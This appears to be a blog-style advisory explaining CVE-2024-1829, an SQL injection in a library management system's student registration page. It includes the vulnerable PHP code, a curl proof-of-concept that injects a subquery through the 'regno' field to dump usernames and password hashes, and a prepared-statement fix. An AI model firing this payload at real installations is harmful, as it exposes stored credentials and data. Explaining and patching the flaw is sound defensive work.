CVE-2024-1829 - Critical SQL Injection in Code-Projects Library System 1. Explained
A dangerous SQL injection vulnerability was found in Code-Projects Library System 1. and has the potential to compromise libraries running this open source platform. Assigned the identifier CVE-2024-1829 (also referenced as VDB-254617), this flaw makes it alarmingly easy for attackers to tamper with the library’s backend database — possibly leaking, modifying, or even erasing data.
- Product: Code-Projects Library System 1.
- Affected File: Source/librarian/user/student/registration.php
- Impact: Critical — can lead to full database compromise
- Discoverer/Disclosure: Publicly disclosed; exploit details are available
Let's break things down simply and walk through what this means, how it works, and how it's exploited.
How Does CVE-2024-1829 Work?
This vulnerability exists in the student registration page (registration.php). The script accepts multiple POST parameters from the user — notably email, regno, phone, and username. These are taken directly from user input and incorporated into SQL queries without proper sanitization or prepared statements.
*In plain English:* Any attacker on the internet can send a specially crafted request and trick the library system into running dangerous SQL commands of their choosing.
Here's a simplified segment of what the problematic PHP code might look like in registration.php:

```php
<?php
// ... (Other initialization code)
// Get user submitted fields (unsafe)
$email = $_POST['email'];
$regno = $_POST['regno'];
$phone = $_POST['phone'];
$username = $_POST['username'];
// Here comes the vulnerable SQL query:
$sql = "INSERT INTO students (email, regno, phone, username) VALUES ('$email', '$regno', '$phone', '$username')";
mysqli_query($conn, $sql); // $conn is database connection
?>
```
Notice that user-supplied data ($email, $regno, etc.) are being stuffed directly into an SQL query without any validation. This is a textbook example of SQL Injection.
How Can an Attacker Exploit This?
An attacker needs only to submit a registration with harmful SQL code in fields like email or regno. Here's a simple proof-of-concept (PoC) to dump user data from the database using the regno field:
Sample Exploit: Using curl
```
curl -X POST http://TARGET/Source/librarian/user/student/registration.php \
-d "email=foo@bar.com" \
-d "regno=abc', (SELECT GROUP_CONCAT(username, ':', password) FROM users)-- -" \
-d "phone=12345" \
-d "username=testuser"
```
*What this does:* The attacker injects a SQL subquery via the regno field, attempting to pull in data from the users table. If successful, the server may expose all usernames and password hashes in its response — or, at worst, modify or delete data.
Yes — here are some public advisories and resources:
- Vuldb Advisory (VDB-254617)
- NVD Entry (when available)
- GitHub - code-projects/Library-Management-System (project homepage)
If you run Code-Projects Library System 1., immediate action is required!
- Do not trust user input: Never put user-supplied data directly into SQL. Use prepared statements instead.
- Sanitize and validate ALL inputs.
- If possible, restrict access to affected pages until a patch can be applied.
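The first two recommendations, applied to the simplified registration snippet shown earlier. This is an added example, not the project's own code or an official patch: it assumes `$conn` is an open mysqli connection and reuses the `students` table and column names from that snippet, and the function names and validation patterns are hypothetical. The prepared statement is what closes the injection; the validation is defense in depth.

```php
<?php
// Added example, not the project's code. Assumes $conn is an open mysqli
// connection and the students table from the simplified snippet above.
// The validation patterns are illustrative; adjust them to the real data.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors throw

function validate_registration(array $post): array
{
    $f = [];
    foreach (['email', 'regno', 'phone', 'username'] as $k) {
        // A parameter sent as an array (regno[]=x) is treated as missing.
        $f[$k] = is_string($post[$k] ?? null) ? trim($post[$k]) : '';
    }
    $bad = [];
    if (filter_var($f['email'], FILTER_VALIDATE_EMAIL) === false) { $bad[] = 'email'; }
    if (!preg_match('/\A[A-Za-z0-9\/-]{1,32}\z/', $f['regno'])) { $bad[] = 'regno'; }
    if (!preg_match('/\A\+?[0-9]{7,15}\z/', $f['phone'])) { $bad[] = 'phone'; }
    if (!preg_match('/\A[A-Za-z0-9_.]{3,32}\z/', $f['username'])) { $bad[] = 'username'; }
    return [$bad, $f];
}

function register_student(mysqli $conn, array $post): bool
{
    [$bad, $f] = validate_registration($post);
    if ($bad) {
        error_log('registration rejected, invalid fields: ' . implode(',', $bad));
        return false;
    }
    try {
        // The SQL text is fixed; values are bound separately, so a quote or
        // subquery typed into a field is stored as data and never parsed as SQL.
        $stmt = $conn->prepare(
            'INSERT INTO students (email, regno, phone, username) VALUES (?, ?, ?, ?)'
        );
        $stmt->bind_param('ssss', $f['email'], $f['regno'], $f['phone'], $f['username']);
        $stmt->execute();
        $stmt->close();
        return true;
    } catch (mysqli_sql_exception $e) {
        error_log('registration insert failed: ' . $e->getMessage()); // log, do not echo
        return false;
    }
}

// In registration.php: $ok = register_student($conn, $_POST);
```

Rejected registrations and failed inserts are written to the PHP error log, which gives defenders a place to spot repeated malformed submissions against this page.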
Closing Thoughts
CVE-2024-1829 is a classic, dangerous SQL injection that puts libraries and their users at risk. If your organization uses Code-Projects Library System, you must act now. Check your installation, patch your code, and always use safe database coding practices!
For detailed mitigation steps, official responses, or to report a compromise, visit the project’s GitHub page or trusted advisories above.
*Stay safe, patch fast, and share this with your library or IT friends who might be affected!*
Timeline
Published on: 02/23/2024 18:15:50 UTC
Last modified on: 03/21/2024 02:51:46 UTC